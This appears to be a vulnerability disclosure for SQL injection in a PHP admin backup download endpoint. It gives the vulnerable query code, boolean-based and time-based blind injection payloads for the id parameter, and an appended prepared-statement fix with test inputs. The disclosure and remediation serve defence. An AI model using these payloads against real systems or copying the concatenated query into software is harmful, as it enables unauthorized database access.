SQL injection exists in the /admin/modules/system/backup.php file. There is no effective defense against the comment field, leading to SQL injection attacks.
The link is: http://192.168.31.63/admin/modules/system/backup.php?action=download&id=1
Vulnerable parameter: id

SQL injection payload:

    Parameter: id (GET)
        Type: boolean-based blind
        Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
        Payload: action=download&id=2 OR NOT 8551=8551

        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: action=download&id=2 AND (SELECT 7623 FROM (SELECT(SLEEP(5)))zpJu)

The problematic code:

    if(isset($_GET['action']) && isset($_GET['id']) && $_GET['action'] == 'download'){
        $id = utility::filterData('id', 'get', true, true, true);
        $_q = $dbs->query("SELECT backup_file FROM backup_log WHERE backup_log_id=".$id);
        $path = $_q->fetch_row()[0];
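One way to close the injection point in the code quoted above, as an added example that is not part of the original report and not the project's own code: the id is allow-listed as a positive integer and then bound as a parameter instead of being concatenated into the query. The helper name findBackupFile() is hypothetical, PDO with an in-memory SQLite database stands in for the application's $dbs connection, and the table rows are constructed sample data.

```php
<?php
declare(strict_types=1);

// Added example, not the project's code. findBackupFile() is a hypothetical
// helper; PDO + in-memory SQLite stands in for the application's $dbs handle.

/**
 * Return the backup_file for a backup_log_id taken from untrusted input,
 * or null when the id is not a positive integer or no such row exists.
 */
function findBackupFile(PDO $db, $rawId): ?string
{
    // 1. Allow-list: the id must parse as an integer >= 1, nothing else.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }

    // 2. Bind the value instead of concatenating it into the SQL text.
    $stmt = $db->prepare('SELECT backup_file FROM backup_log WHERE backup_log_id = ?');
    $stmt->execute([$id]);

    // 3. fetchColumn() returns false when no row matched; never index a missing row.
    $path = $stmt->fetchColumn();
    return $path === false ? null : (string) $path;
}

// Constructed sample data so the example runs offline.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE backup_log (backup_log_id INTEGER PRIMARY KEY, backup_file TEXT)');
$db->exec("INSERT INTO backup_log VALUES (1, '/backup/constructed_1.sql'), (2, '/backup/constructed_2.sql')");

$inputs = [
    '1',                   // well-formed id with a matching row
    '999',                 // well-formed id, no such row
    '2 OR NOT 8551=8551',  // boolean-based payload quoted in the report
    ['2'],                 // array value, as produced by id[]=2 in the query string
];
foreach ($inputs as $raw) {
    $result = findBackupFile($db, $raw);
    printf("%-24s => %s\n", json_encode($raw), $result ?? 'rejected / not found');
}
```

With a mysqli connection the same shape uses prepare(), bind_param('i', $id) and execute() in place of the PDO calls.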